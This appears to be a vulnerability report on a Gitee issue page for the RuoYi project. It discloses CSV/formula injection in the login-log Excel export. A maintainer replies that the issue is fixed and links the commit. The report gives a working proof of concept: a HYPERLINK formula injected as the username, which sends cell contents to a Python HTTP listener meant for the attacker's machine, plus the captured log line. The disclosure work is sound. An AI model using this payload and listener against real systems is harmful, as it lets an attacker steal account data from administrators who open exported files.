The product has the CSV injection vulnerability. For example, the CSV injection vulnerability is used to obtain login accounts.
When a user logs in, in the request of "/login", change the value of username
to =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")
by burpsuite tool.
2.
Run the python script to start the HTTP service with port 8007.
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
data = {'result': 'this is a test'}
# You can change **localhost** to the IP address of the hacker's computer.
host = ('localhost', 8007)
class Resquest(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(data).encode())
if __name__ == '__main__':
server = HTTPServer(host, Resquest)
print("Starting server, listen at: %s:%s" % host)
server.serve_forever()
Choose "日志管理"->"登录日志" ("Log Management"->"Login Log") to view logs, and exporting .xlsx
log file.
Open .xlsx
log file, double-click the cell of =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")
. Then click an empty cell. And then click the cell of =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")
. In this case, a request is sent to the localhost:8007
.
The contents of cells B2
and B3
are admin
and test1
.
Before double-click.
After double-click. And then click E
.
A request is sent to the localhost:8007
through the browser.
5.
The HTTP service with port 8007 receives the following information:
127.0.0.1 - - [18/Jan/2022 17:04:07] "GET /?u=admintest1 HTTP/1.1" 200 -
So, we get user"admin"/"test1"/...
@sanlang 已修复,你可以更新一下代码。
导出Excel时屏蔽公式,防止CSV注入风险
https://gitee.com/y_project/RuoYi/commit/e9ebf86ac8a53bfc8475c7efad6f63a593eaefa9
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
登录 后才可以发表评论